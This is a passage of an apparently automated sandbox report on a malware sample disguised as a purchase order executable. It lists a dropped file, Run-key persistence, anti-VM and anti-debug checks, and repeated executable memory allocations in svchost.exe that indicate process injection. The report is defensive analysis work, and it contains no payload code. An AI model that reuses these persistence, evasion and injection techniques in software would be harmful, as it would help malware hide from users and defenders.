                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EvvuJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EvvuJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion:

                    barindex
                    Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFunction Chain: systemQueried,systemQueried,threadDelayed,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,11_2_00401980
                    Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exe TID: 6660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exe TID: 5992Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exe TID: 6916Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep count: 138 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -4140000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -507620s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -776334s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -388583s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -388778s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -209349s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -89670s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -59688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_504851E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,5_2_504851E0
                    Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040CDC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040CDC9
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,11_2_00401980
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,11_2_00401980
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040AD70 GetProcessHeap,HeapFree,11_2_0040AD70
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040CDC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040CDC9
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040E5DC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040E5DC
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00416F2A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00416F2A
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_004123B1 SetUnhandledExceptionFilter,11_2_004123B1
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Allocates memory in foreign processesShow sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 50480000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 180000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 190000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1A0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 440000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 450000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 460000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 470000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 480000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 490000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4A0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4B0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4C0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4E0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B10000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B20000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B30000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B40000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B50000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B60000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B70000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B80000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B90000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BA0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BB0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BC0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BD0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BE0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BF0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C00000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C10000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C20000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C30000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C40000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C50000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C60000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C70000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C80000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C90000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CA0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CB0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CC0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CD0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CE0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CF0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D00000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D10000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D20000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D30000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D40000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D50000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D60000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D70000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D80000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D90000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DA0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DB0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DC0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DD0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DE0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DF0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E00000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E10000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E20000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E30000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E40000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E50000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E60000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E70000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E80000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E90000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: EA0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: EB0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: EC0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: ED0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: EE0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: EF0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F00000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F10000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F20000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F30000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F40000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F50000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F60000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F70000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F80000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F90000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FA0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FB0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FC0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FD0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FE0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FF0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1000000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1010000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1020000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1030000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1040000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1050000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1060000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1070000 protect: page execute and read and writeJump to behavior
